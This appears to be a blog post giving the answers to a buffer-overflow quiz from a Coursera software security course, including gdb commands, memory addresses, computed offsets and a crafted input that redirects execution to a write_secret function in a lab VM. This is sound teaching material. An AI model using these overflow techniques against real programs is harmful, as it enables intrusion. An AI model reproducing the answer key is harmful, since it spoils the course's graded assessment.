Software Security Week 1 VM BOF Quiz Answer
In this article I am going to share the answers to the VM BOF quiz from Week 1 of the Coursera course Software Security.
VM BOF Quiz Answer
Question 1) There is a stack-based overflow in the program.
What is the name of the stack-allocated variable that contains the overflowed buffer?
- Answer: wis
Question 2) Consider the buffer you just identified:
Running what line of code will overflow the buffer?
- Answer: 62
Question 3) There is another vulnerability, not dependent at all on the first, involving a non-stack allocated buffer that can be indexed outside its bounds. What variable contains this buffer?
- Answer: ptrs
Question 4) Consider the buffer you just identified: Running what line of code overflows the buffer?
- Answer: 101
Question 5) What is the address of buf?
- Answer: 0xbfff f130
Question 6) What is the address of ptrs?
- Answer: 0x0804 a0d4
Question 7) What is the address of write_secret?
- Answer: 0x0804 8534
Question 8) What is the address of p local to main?
- Answer: 0xbfff f534
Question 9) What input do you provide so that ptrs[s] reads/executes the contents of the variable p instead of a function pointer in the ptrs buffer? If correct, you will execute the pat_on_back function. Enter your answer as an unsigned integer.
Answer:
- (p-ptrs)/4 is
- print /x (0xbffff534 - 0x804a0d4)/4
- 0x2dfed518 or 771675416
Question 10) What do you enter so that ptrs[s] reads (and then tries to execute) starting from the 65th byte in buf, i.e., the location at buf[64]?
Enter your answer as an unsigned integer.
Answer:
- (gdb) print /x &buf[64]
- $6 = 0xbffff170
- (gdb) print /d (int*)&buf[64]-(int *)&ptrs
- $14 = 771675175
- 771675175
Question 11) What do you replace \xEE\xEE\xEE\xEE with to call write_secret?
Answer:
- (gdb) print &write_secret
- $7 = (void (*)(void)) 0x8048534 <write_secret>
- 771675175x00AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAx34x85x04x08
Question 12) Suppose you wanted to overflow the wis variable to perform a stack smashing attack. You could do this by entering 2 to call put_wisdom, and then enter enough bytes to overwrite the return address of that function, replacing it with the address of write_secret. How many bytes do you need to enter prior to the address of write_secret?
- 148
- eip at 0xbffff10c
- (gdb) print &wis
- $6 = (char (*)[128]) 0xbffff078
- (gdb) print 0xbffff10c - 0xbffff078
- $10 = 148
Good Afternoon
Any Update on This VM BOF quiz
Thanks